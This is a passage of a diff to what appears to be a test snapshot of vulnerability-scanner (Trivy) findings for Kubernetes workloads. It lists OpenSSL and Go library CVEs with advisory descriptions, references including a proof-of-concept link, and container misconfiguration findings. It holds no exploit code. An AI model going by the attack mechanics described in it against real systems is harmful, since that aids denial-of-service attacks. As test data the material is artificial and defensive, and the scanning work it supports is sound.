"https://ubuntu.com/security/notices/USN-5328-1", + "https://ubuntu.com/security/notices/USN-5328-2", + "https://www.cve.org/CVERecord?id=CVE-2022-0778", + "https://www.debian.org/security/2022/dsa-5103", + "https://www.openssl.org/news/secadv/20220315.txt", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujul2022.html", + "https://www.tenable.com/security/tns-2022-06", + "https://www.tenable.com/security/tns-2022-07", + "https://www.tenable.com/security/tns-2022-08", + "https://www.tenable.com/security/tns-2022-09", + ], + }, + "category": "Vulnerability", + "description": "The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop forever for non-prime moduli. Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters. Since certificate parsing happens prior to verification of the certificate signature, any process that parses an externally supplied certificate may thus be subject to a denial of service attack. The infinite loop can also be reached when parsing crafted private keys as they can contain explicit elliptic curve parameters. Thus vulnerable situations include: - TLS clients consuming server certificates - TLS servers consuming client certificates - Hosting providers taking certificates or private keys from customers - Certificate authorities parsing certification requests from subscribers - Anything else which parses ASN.1 elliptic curve parameters Also any other applications that use the BN_mod_sqrt() where the attacker can control the parameter values are vulnerable to this DoS issue. In the OpenSSL 1.0.2 version the public key is not parsed during initial parsing of the certificate which makes it slightly harder to trigger the infinite loop. However any operation which requires the public key from the certificate will trigger the infinite loop. In particular the attacker can use a self-signed certificate to trigger the loop during verification of the certificate signature. This issue affects OpenSSL versions 1.0.2, 1.1.1 and 3.0. It was addressed in the releases of 1.1.1n and 3.0.2 on the 15th March 2022. Fixed in OpenSSL 3.0.2 (Affected 3.0.0,3.0.1). Fixed in OpenSSL 1.1.1n (Affected 1.1.1-1.1.1m). Fixed in OpenSSL 1.0.2zd (Affected 1.0.2-1.0.2zc).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "openssl: Infinite loop in BN_mod_sqrt() reachable when parsing certificates", + "references": [ { "type": "URL", - "value": "https://go.dev/cl/455635", + "value": "https://avd.aquasec.com/nvd/cve-2022-0778", }, { "type": "URL", - "value": "https://go.dev/cl/455717", + "value": "http://packetstormsecurity.com/files/167344/OpenSSL-1.0.2-1.1.1-3.0-BN_mod_sqrt-Infinite-Loop.html", }, { "type": "URL", - "value": "https://go.dev/issue/56350", + "value": "http://seclists.org/fulldisclosure/2022/May/33", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "value": "http://seclists.org/fulldisclosure/2022/May/35", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "value": "http://seclists.org/fulldisclosure/2022/May/38", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", + "value": "https://access.redhat.com/errata/RHSA-2022:5326", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-0778", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "value": "https://bugzilla.redhat.com/2062202", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1144", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2062202", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-712929.pdf", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0778", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": "0.3.8", - "foundIn": "Target: 'metrics-sidecar' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-32149", - "installedVersion": "v0.3.7", - "packageName": "golang.org/x/text", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-32149", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", - "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", - "https://github.com/golang/go/issues/56152", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", - "https://go.dev/cl/442235", - "https://go.dev/issue/56152", - "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", - "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", - "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", - "https://pkg.go.dev/vuln/GO-2022-1059", - "https://ubuntu.com/security/notices/USN-5873-1", - "https://www.cve.org/CVERecord?id=CVE-2022-32149", - ], - }, - "category": "Vulnerability", - "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", - "mitigation": undefined, - "name": "ParseAcceptLanguage takes a long time to parse complex tags", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-32149", + "value": "https://errata.almalinux.org/8/ALSA-2022-5326.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-32149", + "value": "https://errata.rockylinux.org/RLSA-2022:4899", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=3118eb64934499d93db3230748a452351d1d9a65", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=380085481c64de749a6dd25cdf0bcf4360b30f83", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/56152", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a466912611aa6cbdf550cd10601390e587451246", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "value": "https://github.com/advisories/GHSA-x3mh-jvjw-3xwx", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "value": "https://linux.oracle.com/cve/CVE-2022-0778.html", }, { "type": "URL", - "value": "https://go.dev/cl/442235", + "value": "https://linux.oracle.com/errata/ELSA-2022-9272.html", }, { "type": "URL", - "value": "https://go.dev/issue/56152", + "value": "https://lists.debian.org/debian-lts-announce/2022/03/msg00023.html", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "value": "https://lists.debian.org/debian-lts-announce/2022/03/msg00024.html", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/323SNN6ZX7PRJJWP2BUAFLPUAE42XWLZ/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GDB3GQVJPXJE7X5C5JN6JAA4XUDWD6E6/", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1059", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W6K3PR542DXWLEFFMFIDMME4CWMHJRMG/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5873-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0778", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0002", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/dashboard-metrics-scraper' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV003", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", - "https://avd.aquasec.com/misconfig/ksv003", - ], - }, - "category": "Misconfiguration", - "description": "The container should drop all default capabilities and add only those that are needed for its execution.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", - "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", - "name": "Default capabilities not dropped(Container 'dashboard-metrics-scraper' of Deployment 'dashboard-metrics-scraper' should add 'ALL' to 'securityContext.capabilities.drop')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv003", + "value": "https://rustsec.org/advisories/RUSTSEC-2022-0014.html", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "value": "https://security.gentoo.org/glsa/202210-02", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/dashboard-metrics-scraper' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV011", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv011", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", - "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", - "name": "CPU not limited(Container 'dashboard-metrics-scraper' of Deployment 'dashboard-metrics-scraper' should set 'resources.limits.cpu')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv011", + "value": "https://security.netapp.com/advisory/ntap-20220321-0002/", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://security.netapp.com/advisory/ntap-20220429-0005/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/dashboard-metrics-scraper' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV012", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv012", - ], - }, - "category": "Misconfiguration", - "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", - "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", - "name": "Runs as root user(Container 'dashboard-metrics-scraper' of Deployment 'dashboard-metrics-scraper' should set 'securityContext.runAsNonRoot' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv012", + "value": "https://support.apple.com/kb/HT213255", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://support.apple.com/kb/HT213256", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/dashboard-metrics-scraper' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV015", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv015", - ], - }, - "category": "Misconfiguration", - "description": "When containers have resource requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", - "mitigation": "Set 'containers[].resources.requests.cpu'.", - "name": "CPU requests not specified(Container 'dashboard-metrics-scraper' of Deployment 'dashboard-metrics-scraper' should set 'resources.requests.cpu')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv015", + "value": "https://support.apple.com/kb/HT213257", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://ubuntu.com/security/notices/USN-5328-1", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/dashboard-metrics-scraper' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV016", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv016", - ], - }, - "category": "Misconfiguration", - "description": "When containers have memory requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", - "mitigation": "Set 'containers[].resources.requests.memory'.", - "name": "Memory requests not specified(Container 'dashboard-metrics-scraper' of Deployment 'dashboard-metrics-scraper' should set 'resources.requests.memory')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv016", + "value": "https://ubuntu.com/security/notices/USN-5328-2", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-0778", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/dashboard-metrics-scraper' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV018", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv018", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing memory limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", - "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", - "name": "Memory not limited(Container 'dashboard-metrics-scraper' of Deployment 'dashboard-metrics-scraper' should set 'resources.limits.memory')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv018", + "value": "https://www.debian.org/security/2022/dsa-5103", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://www.openssl.org/news/secadv/20220315.txt", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/dashboard-metrics-scraper' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV020", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv020", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", - "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'dashboard-metrics-scraper' of Deployment 'dashboard-metrics-scraper' should set 'securityContext.runAsUser' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv020", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/dashboard-metrics-scraper' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV021", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv021", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", - "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'dashboard-metrics-scraper' of Deployment 'dashboard-metrics-scraper' should set 'securityContext.runAsGroup' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv021", + "value": "https://www.tenable.com/security/tns-2022-06", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://www.tenable.com/security/tns-2022-07", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/dashboard-metrics-scraper' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV106", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv106", - ], - }, - "category": "Misconfiguration", - "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", - "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", - "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv106", + "value": "https://www.tenable.com/security/tns-2022-08", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://www.tenable.com/security/tns-2022-09", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "3.0.0-20220521103104-8f96da9f5d5e", - "foundIn": "Target: 'manager' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-28948", - "installedVersion": "v3.0.0-20220512140231-539c8e751b99", - "packageName": "gopkg.in/yaml.v3", + "fixedVersion": "1.1.1n-0+deb10u4", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4450", + "installedVersion": "1.1.1d-0+deb10u6", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-28948", - "https://github.com/advisories/GHSA-hp87-p4gw-j4gq", - "https://github.com/go-yaml/yaml/commit/8f96da9f5d5eff988554c1aae1784627c4bf6754", - "https://github.com/go-yaml/yaml/issues/666", - "https://nvd.nist.gov/vuln/detail/CVE-2022-28948", - "https://security.netapp.com/advisory/ntap-20220923-0006/", - "https://www.cve.org/CVERecord?id=CVE-2022-28948", + "https://access.redhat.com/errata/RHSA-2023:2165", + "https://access.redhat.com/security/cve/CVE-2022-4450", + "https://bugzilla.redhat.com/1960321", + "https://bugzilla.redhat.com/2164440", + "https://bugzilla.redhat.com/2164487", + "https://bugzilla.redhat.com/2164492", + "https://bugzilla.redhat.com/2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "https://errata.rockylinux.org/RLSA-2023:0946", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=63bcf189be73a9cc1264059bed6f57974be74a83", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=bbcf509bd046b34cca19c766bbddc31683d0858b", + "https://github.com/advisories/GHSA-v5w6-wcm8-jm4q", + "https://linux.oracle.com/cve/CVE-2022-4450.html", + "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4450", + "https://rustsec.org/advisories/RUSTSEC-2023-0010.html", + "https://ubuntu.com/security/notices/USN-5844-1", + "https://www.cve.org/CVERecord?id=CVE-2022-4450", + "https://www.openssl.org/news/secadv/20230207.txt", ], }, "category": "Vulnerability", - "description": "An issue in the Unmarshal function in Go-Yaml v3 causes the program to crash when attempting to deserialize invalid input.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-controller-manager", + "description": "The function PEM_read_bio_ex() reads a PEM file from a BIO and parses and decodes the "name" (e.g. "CERTIFICATE"), any header data and the payload data. If the function succeeds then the "name_out", "header" and "data" arguments are populated with pointers to buffers containing the relevant decoded data. The caller is responsible for freeing those buffers. It is possible to construct a PEM file that results in 0 bytes of payload data. In this case PEM_read_bio_ex() will return a failure code but will populate the header argument with a pointer to a buffer that has already been freed. If the caller also frees this buffer then a double free will occur. This will most likely lead to a crash. This could be exploited by an attacker who has the ability to supply malicious PEM files for parsing to achieve a denial of service attack. The functions PEM_read_bio() and PEM_read() are simple wrappers around PEM_read_bio_ex() and therefore these functions are also directly affected. These functions are also called indirectly by a number of other OpenSSL functions including PEM_X509_INFO_read_bio_ex() and SSL_CTX_use_serverinfo_file() which are also vulnerable. Some OpenSSL internal uses of these functions are not vulnerable because the caller does not free the header argument if PEM_read_bio_ex() returns a failure code. These locations include the PEM_read_bio_TYPE() functions as well as the decoders introduced in OpenSSL 3.0. The OpenSSL asn1parse command line application is also impacted by this issue.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "crash when attempting to deserialize invalid input", + "name": "double free after calling PEM_read_bio_ex", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-28948", + "value": "https://avd.aquasec.com/nvd/cve-2022-4450", + }, + { + "type": "URL", + "value": "https://access.redhat.com/errata/RHSA-2023:2165", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-28948", + "value": "https://access.redhat.com/security/cve/CVE-2022-4450", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-hp87-p4gw-j4gq", + "value": "https://bugzilla.redhat.com/1960321", }, { "type": "URL", - "value": "https://github.com/go-yaml/yaml/commit/8f96da9f5d5eff988554c1aae1784627c4bf6754", + "value": "https://bugzilla.redhat.com/2164440", }, { "type": "URL", - "value": "https://github.com/go-yaml/yaml/issues/666", + "value": "https://bugzilla.redhat.com/2164487", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-28948", + "value": "https://bugzilla.redhat.com/2164492", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220923-0006/", + "value": "https://bugzilla.redhat.com/2164494", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-28948", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-controller-manager' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV020", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv020", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-controller-manager", - "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'manager' of Deployment 'securecodebox-controller-manager' should set 'securityContext.runAsUser' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv020", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-controller-manager' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV021", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv021", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-controller-manager", - "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'manager' of Deployment 'securecodebox-controller-manager' should set 'securityContext.runAsGroup' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv021", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-controller-manager' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV030", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv030", - ], - }, - "category": "Misconfiguration", - "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-controller-manager", - "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", - "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv030", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/securecodebox-controller-manager' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV106", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv106", - ], - }, - "category": "Misconfiguration", - "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-controller-manager", - "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", - "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv106", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2020-8911", - "installedVersion": "v1.35.9", - "packageName": "github.com/aws/aws-sdk-go", - "references": [ - "https://access.redhat.com/security/cve/CVE-2020-8911", - "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", - "https://bugzilla.redhat.com/show_bug.cgi?id=1869800", - "https://github.com/advisories/GHSA-f5pg-7wfw-84q9", - "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", - "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", - "https://github.com/aws/aws-sdk-go/pull/3403", - "https://github.com/google/security-research/security/advisories/GHSA-f5pg-7wfw-84q9", - "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", - 